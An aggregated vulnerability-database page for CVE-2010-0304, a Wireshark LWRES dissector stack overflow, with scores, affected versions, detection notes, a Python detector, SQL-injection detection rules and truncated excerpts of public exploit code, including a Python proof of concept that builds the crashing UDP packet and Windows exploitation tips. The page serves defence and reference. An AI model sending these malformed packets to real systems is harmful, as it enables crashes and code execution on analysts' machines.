CVE-2010-0304
Published 2010-02-03
Priority: P264 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT: public exploit available · EPSS: 73.67% (99.4th percentile)
Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allow remote attackers to cause a denial of service (crash) via a malformed packet, as demonstrated using a stack-based buffer overflow to the dissect_getaddrsbyname_request function.
Affected (25 ranges)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wireshark | < wireshark 1.2.6-1 (bookworm) | wireshark 1.2.6-1 (bookworm) |
| wireshark | wireshark | — | — |
| wireshark | wireshark | >= 0 < 1.2.6-1 | 1.2.6-1 |
Detection & IOCs (extracted from sources)

Bytes:
- \x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
- \x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 [len 2 bytes] [payload] \x00\x00

Detection notes:
- The exploit targets UDP port 921 (the LWRES default port). Monitor for oversized or malformed UDP datagrams to port 921 with the magic header bytes \x00\x00\x01\x5d.
- The malicious LWRES packet begins with a fixed 36-byte header starting with \x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01. Detect this byte pattern in UDP payloads on port 921.
- The loop variant of the exploit sends the malicious packet to the multicast address 239.255.255.250 on UDP/921 repeatedly. Monitor for LWRES traffic to this multicast destination.
- The vulnerable code path is only triggered when Wireshark/tshark renders the packet dissection. Fragmented packets must be fully reassembled before the overflow fires; look for UDP fragment reassembly of LWRES traffic.
- On Windows targets, the exploit uses an SEH overwrite bypass (not a direct return address overwrite) because of /GS stack cookie protection. A payload length of ~2128 bytes is used for the Windows SEH target.
- The overflow occurs in dissect_getaddrsbyname_request inside packet-lwres.c. The name-length field in the LWRES request is attacker-controlled and is used to copy into a fixed stack buffer without bounds checking.

Other notes:
- The exploit default target (loop variant) is set to target index 4 (Windows x86), not Linux. Adjust target selection accordingly when testing.
- Null bytes (\x00) are bad characters for the payload; the exploit cannot deliver shellcode containing null bytes.
- The Windows SEH exploit packet is large enough to be fragmented over UDP, which may cause additional complications and reduce reliability.
- The payload space is limited to 512 bytes; NOP sleds and large stagers may not fit.
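As an added detection example (not code from this page or from any of the sources it aggregates), the following Python parses a UDP/921 payload according to the LWRES layout visible in the IoC bytes above (a 28-byte packet header carrying length, version, flags, serial, opcode, result, recvlength, authtype and authlength, followed by the getaddrsbyname request's flags, address types and 2-byte name length) and flags the conditions the notes describe: a name length that is implausibly large or that runs past the end of the datagram, and a packet length field that disagrees with the datagram size. The field names follow the lwres wire format; treating a name length above the RFC 1035 limit of 255 octets as anomalous is this example's own heuristic, the handling of a non-zero authlength is an assumption (the IoC bytes carry zero), and the benign and truncated samples are constructed here, while the malformed sample is the page's own 36-byte IoC prefix followed by the PoC's 380-byte name.

```python
"""Heuristic inspection of LWRES getaddrsbyname requests seen on UDP/921."""
import struct

LWRES_PORT = 921
# LWRES packet header: length, version, pktflags, serial, opcode, result,
# recvlength, authtype, authlength (all big-endian) = 28 bytes.
LWRES_PKT_HDR = struct.Struct(">IHHIIIIHH")
# getaddrsbyname request header: flags, addrtypes, namelen = 10 bytes.
GETADDRS_REQ_HDR = struct.Struct(">IIH")
OPCODE_GETADDRSBYNAME = 0x00010001
MAX_DNS_NAME_LEN = 255   # RFC 1035 upper bound on a domain name; larger is anomalous


def inspect_lwres_datagram(payload: bytes, dst_port: int = LWRES_PORT) -> list:
    """Return finding strings for one UDP payload; an empty list means it looks well-formed."""
    findings = []
    if dst_port != LWRES_PORT:
        return findings
    if len(payload) < LWRES_PKT_HDR.size:
        return ["shorter than the 28-byte LWRES packet header"]
    (length, _version, _pktflags, _serial, opcode, _result,
     _recvlength, _authtype, authlength) = LWRES_PKT_HDR.unpack_from(payload, 0)
    if length != len(payload):
        findings.append(f"length field {length} != datagram size {len(payload)}")
    if opcode != OPCODE_GETADDRSBYNAME:
        return findings              # only the getaddrsbyname request is modelled here
    if authlength != 0:
        # Assumption: auth data would precede the request body; not modelled.
        findings.append("non-zero authlength not modelled; body checks skipped")
        return findings
    body = LWRES_PKT_HDR.size
    if len(payload) < body + GETADDRS_REQ_HDR.size:
        findings.append("truncated getaddrsbyname request header")
        return findings
    _flags, _addrtypes, namelen = GETADDRS_REQ_HDR.unpack_from(payload, body)
    if namelen > MAX_DNS_NAME_LEN:
        findings.append(f"name length {namelen} exceeds RFC 1035 maximum of {MAX_DNS_NAME_LEN}")
    if body + GETADDRS_REQ_HDR.size + namelen > len(payload):
        findings.append(f"name length {namelen} runs past the end of the datagram")
    return findings


# The 36-byte prefix listed under "Detection & IOCs" (28-byte packet header,
# then flags=0 and addrtypes=1), followed by the PoC's 380-byte name.  This is
# the page's own IoC, reproduced here only as detector input.
IOC_PREFIX = (b"\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
              b"\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
              b"\x00\x00\x00\x01")
MALFORMED_SAMPLE = IOC_PREFIX + struct.pack(">H", 380) + b"B" * 380 + b"\x00\x00"

# Constructed benign request (not from the page): same header layout, a
# 16-byte name, and a length field that matches the datagram size.
_BENIGN_NAME = b"host.example.com"
_BENIGN_BODY = GETADDRS_REQ_HDR.pack(0, 1, len(_BENIGN_NAME)) + _BENIGN_NAME + b"\x00\x00"
BENIGN_SAMPLE = LWRES_PKT_HDR.pack(LWRES_PKT_HDR.size + len(_BENIGN_BODY), 0, 0,
                                   0x4B491C52, OPCODE_GETADDRSBYNAME, 0, 0x4000, 0, 0) + _BENIGN_BODY

# Constructed truncated request (not from the page): the name length claims
# 200 bytes but only 10 are present, so the dissector would read past the end.
_TRUNC_BODY = GETADDRS_REQ_HDR.pack(0, 1, 200) + b"short.name" + b"\x00\x00"
TRUNCATED_SAMPLE = LWRES_PKT_HDR.pack(LWRES_PKT_HDR.size + len(_TRUNC_BODY), 0, 0,
                                      1, OPCODE_GETADDRSBYNAME, 0, 0x4000, 0, 0) + _TRUNC_BODY

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN_SAMPLE), ("malformed", MALFORMED_SAMPLE),
                       ("truncated", TRUNCATED_SAMPLE)):
        print(label, inspect_lwres_datagram(pkt) or "ok")
```

Feed `inspect_lwres_datagram` the UDP payload of each datagram to port 921 after reassembly (the notes above point out the overflow only fires on the reassembled packet, so a per-fragment check would miss the oversized name). The same three checks translate directly into IDS logic: a content match on the opcode bytes at a fixed offset plus a byte_test on the 2-byte name length field.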
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 7.5 | HIGH | |
| vendor_debian | | 7.5 | HIGH | |
| vendor_redhat | | 7.5 | HIGH | |
Red Hat
wireshark: crash in LWRES dissector
vendor_redhat · 2010-01-27 · CVSS 7.5 · HIGH
Debian
CVE-2010-0304: wireshark - Multiple buffer overflows in the LWRES dissector in Wireshark 0.9.15 through 1.0...
vendor_debian · 2010 · CVSS 7.5 · HIGH
Scope: local
bookworm: resolved (fixed in 1.2.6-1)
bullseye: resolved (fixed in 1.2.6-1)
forky: resolved (fixed in 1.2.6-1)
sid: resolved (fixed in 1.2.6-1)
trixie: resolved (fixed in 1.2.6-1)
VulDB
Wireshark up to 1.2.5 overflow.ck dissect_getaddrsbyname_request memory corruption (EDB-16289 / Nessus ID 44429)
vuldb · 2026-04-30 · CVSS 7.5 · HIGH
A vulnerability labeled as critical has been found in Wireshark. This issue affects the function dissect_getaddrsbyname_request of the file overflow.ck. The manipulation results in memory corruption. This vulnerability is identified as CVE-2010-0304. The attack can be executed remotely. Additionally, an exploit exists. The affected component should be upgraded.
GHSA
GHSA-jpr3-gg36-wv7f: Multiple buffer overflows in the LWRES dissector in Wireshark 0
ghsa_unreviewed · 2022-05-02 · HIGH · CWE-119

OSV
CVE-2010-0304: Multiple buffer overflows in the LWRES dissector in Wireshark 0
osv · 2010-02-03 · CVSS 7.5 · HIGH
Suricata
The six Emerging Threats rules below reference CVE-2007-0304 (a SQL injection in the MiNT Haber Sistemi web application, matched on HTTP requests to duyuru.asp), not CVE-2010-0304. They do not inspect UDP/921 or LWRES traffic and are not detection coverage for the Wireshark LWRES overflow.

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UNION SELECT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005604; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id ASCII"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005607; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T119

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005608; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190,

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id SELECT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005603; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id INSERT"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005605; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190

ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE
suricata · 2010-07-30 · CVE-2007-0304 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id DELETE"; flow:established,to_server; http.uri; content:"/duyuru.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-0304; reference:url,www.milw0rm.com/exploits/3120; classtype:web-application-attack; sid:2005606; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190
Exploit-DB
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
exploitdb · 2010-11-24 · CVE-2010-0304
---
##
# $Id: wireshark_lwres_getaddrbyname_loop.rb 11126 2010-11-24 19:25:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'racket'
class Metasploit3 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
Exploit-DB
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)
exploitdb · 2010-02-11 · CVE-2010-0304
---
##
# $Id: wireshark_lwres_getaddrbyname.rb 8454 2010-02-11 09:03:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'racket'
class Metasploit3 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
This particular ex
Exploit-DB
Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
exploitdb · 2010-01-29 · CVE-2010-0304
---
#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow PoC
# with control over EIP on Debian 5.0.3
# by babi on 29 Jan 2010
# get it at http://www.wireshark.org/download/src/all-versions/wireshark-1.2.5.tar.gz
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " "
exit(2)
port = 921
addr = (host, port)
leng = 380
high = int(leng / 256)
low = leng & 255
data = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + ("B" * leng) + "\x00\x00"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.
Metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
metasploit
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet diss
Metasploit
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
metasploit
References
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h
- http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036415.html
- http://osvdb.org/61987
- http://secunia.com/advisories/38257
- http://secunia.com/advisories/38348
- http://secunia.com/advisories/38829
- http://www.debian.org/security/2010/dsa-1983
- http://www.mandriva.com/security/advisories?name=MDVSA-2010:031
- http://www.metasploit.com/modules/exploit/multi/misc/wireshark_lwres_getaddrbyname
- http://www.openwall.com/lists/oss-security/2010/01/29/4
- http://www.securityfocus.com/bid/37985
- http://www.securitytracker.com/id?1023516
- http://www.vupen.com/english/advisories/2010/0239
- http://www.wireshark.org/security/wnpa-sec-2010-01.html
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55951
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8490
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9933